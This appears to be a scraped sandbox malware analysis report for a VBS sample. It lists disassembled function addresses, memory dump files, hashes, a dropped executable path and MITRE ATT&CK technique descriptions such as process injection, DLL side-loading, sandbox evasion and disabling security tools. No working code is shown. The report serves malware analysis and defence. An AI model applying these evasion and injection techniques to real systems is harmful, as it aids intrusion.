Function 0232FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0232FD94

Memory Dump Source

Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true

Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: b03f1ffa14fd986831c94d80203b6a077c9f3a7e1f626d04a9ffee96fdd209d8
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: F391A231D0022AEFDF25CF58C845BAEB7B4FF45708F20846AD859A7552E7309B49CB91

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KjFT0qPTo4.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\temp_executable.exe

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
KjFT0qPTo4.vbs

Function 002C9970 Relevance: 1.9, Strings: 1, Instructions: 605
COMMON

Function 002CA464 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 267
processCOMMON

Function 002C962C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264
processCOMMON

Function 002C9674 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 002C9650 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 002C9638 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 002C9680 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 002CA8B0 Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Function 002C9668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 002C9698 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Function 002CAFE1 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 022F07AC Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMON

Function 022EFAE8 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMONLIBRARYCODE

Function 022EFB68 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMONLIBRARYCODE

Function 022EF9F0 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMONLIBRARYCODE

Function 022EFDC0 Relevance: 1.5, APIs: 1, Instructions: 6
libraryCOMMON

Function 0042C8D3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042C883 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042C923 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre